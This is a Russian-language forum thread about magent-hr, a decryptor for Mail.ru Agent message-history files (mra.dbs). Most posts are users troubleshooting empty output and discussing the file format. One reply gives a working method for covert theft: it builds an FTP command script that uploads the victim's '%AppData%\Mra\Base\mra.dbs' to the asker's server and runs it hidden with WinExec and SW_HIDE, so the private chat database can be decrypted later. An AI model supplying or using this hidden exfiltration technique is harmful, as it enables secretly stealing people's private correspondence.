Gar|k можешь подсказать что в код добавить чтобы посылало на ftp?? только если не будит трудно на пишу что каждая строка отправляет для delphi
WyBie не особо тебя понял... самый простой вариант... программно делаешь такой текстовик С:\temp_ftp.ololo Code: open ftp.site you_login you_pass put "%AppData%\Mra\Base\mra.dbs" disconnect quit Путь до файла mra.dbs тоже генерь лучше программно (вот чтоб не мучался есть такая системная функция ExpandEnvironmentStrings ) вот далее выполняешь что-то типа WinExec('ftp -s:С:\temp_ftp.ololo', SW_HIDE); и файлик улетел тебе на ftp ) а там хочешь расшифровывай его хочешь не расшифровывай )
Спасибо что выложил такую программку Понимаешь я совсем недавно начала так вот 1 вопрос заключается в том, что у меня есть программа она достает кое какие данные и их надо отправить на ftp и mail а я незнаю как данные лежат в программе тексте Memo1 программа написанна на delphi плиз если знаешь то отпиши
WyBie я не знаю и не люблю Delphi и ты пишешь оффтоп... гугли таких программ куча Code: site:forum.antichat.ru статьи delphi ftp первая ссылка - http://forum.antichat.ru/showpost.php?p=699686&postcount=7
выдает пустое файло (версия 5.4). путь правильный в кавычках, еще пробовал mra.dbs переносить в каталог с magent-hr.exe. такое впечатление что команде magent-hr m mail.txt mra.dbs похеру на "mra.dbs", я пробовал писать даже так специально неправильно magent-hr m mail.txt mmaaasda.dbs - меня спрашивало создать ли новый файл или нет и создавала пустое файло. в чем может быть проблема? размер исходника 704 кб, данные там точно должны быть. в чем может быть проблема? как на твоем блоге (2Gar|k) так и тут есть юзеры с похожей проблемой (пустой файл на выходе)
xwatk там реально может и не быть переписки даже если размер большой файла в крайнем случае пришли мне файл свой (закачай в куданить в нете и дай линк в личку), но у меня реально не времени нет не желания разбираться, потому что в большинстве случаев кто-то что-то не так делает...
up ) обновилась программа версия 2.3 теперь распознает дату сообщения и читает истории агента версии 5.6
Все нервы ушли на запуск magent-hr 2.3RC. после сmd сразу пишет начальный путь С:\Documents and Settings\Admin> и все дальше папку Application Data и дальнейшее расположение файла вообще никак не воспринимает, про какие то кавычки писали, где их ставить так и не поняла, саму программу запускала но сразу вылазиет сообщение от Visual Studio, его закрываешь прога тоже вырубается...короче кошмар..может Вы хоть какие нибудь скриншоты пошаговые выложите, пожалуйста
Пока собирал оболочку для дешифровщика возник вопрос-можно выводить не только отправителя но и адресата? А то лажа получается ))
c0zak, я на пару с одним челом давно понял принцип хранения данных в этой базе. Теоретически могу составить полную цепочку переговоров в легкую - проверялось это просто поиском определенных значений на глаз. Но найти алгоритм или смысл в этих числах я не смог => нет НОРМАЛЬНОЙ программы, а моя попытка хоть что-то реализовать закончилась неудачей. В принципе могу описать алгоритм (я уже думал над этим, но лень делать скрины и оформлять статью) также можно попытаться реализовать что-то на скриптовых языках для быстроты разработки - но чето я давно забил на эту тему
Gar|k, всётаки надеемся найдётся время на описание формата? Могу попытаться на скриптовом языке читать эту базу.
У меня почему-то из mra.dbs только исходящие сообщения извлекаются. Так и должно быть или это косяк? Версия агента 5.7
такая же проблема, пустой файл на выходе, пробывал все версии программы, но у меня файл mra.dbs с мобильной версии агента
И так отвечаю на вопросы На проект я забил еще с полгода назад. Для энтузиастов я выложил описание формата mra.dbs в надежде что кто-то напишет прожку ловчей. Сейчас моя приоритетная задача диплом, но если программа действительно нужная и вы даже готовы заплатить денюжку за неё... могу попытаться продолжить труды. В своем блоге я разместил голосование, все кто заинтересован принимаем участие